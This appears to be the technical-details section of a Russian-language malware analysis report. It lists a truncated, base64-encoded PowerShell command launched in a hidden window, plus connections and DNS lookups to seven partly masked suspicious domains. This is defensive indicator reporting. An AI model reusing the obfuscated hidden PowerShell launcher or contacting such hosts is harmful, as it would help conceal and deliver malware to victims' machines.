Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBFAFQALQBpAFQAZQBNACAAVgBBAHIAaQBhAGIATABFADoAWABJAGQAbgB1ACAAIAAoACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMQB9AHsAMgB9ACIAIAAtAEYAIAAnAFMAJwAsACcALgBJAG8ALgBEAEkAUg...
- 'va####tegrated.com':443
- 'de####tarabia.com':443
- '3e###tions.com':443
- 'za####bbeauty.com':443
- 'ms####sultoria.net':443
- 'be#####rtionpillsrx.com':443
- 'on####qeramika.com':443
- DNS ASK va####tegrated.com
- DNS ASK de####tarabia.com
- DNS ASK 3e###tions.com
- DNS ASK za####bbeauty.com
- DNS ASK ms####sultoria.net
- DNS ASK be#####rtionpillsrx.com
- DNS ASK on####qeramika.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBFAFQALQBpAFQAZQBNACAAVgBBAHIAaQBhAGIATABFADoAWABJAGQAbgB1ACAAIAAoACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMQB9AHsAMgB9ACIAIAAtAEYAIAAnAFMAJwAsACcALgBJAG8ALgBEAEkAUg...' (со скрытым окном)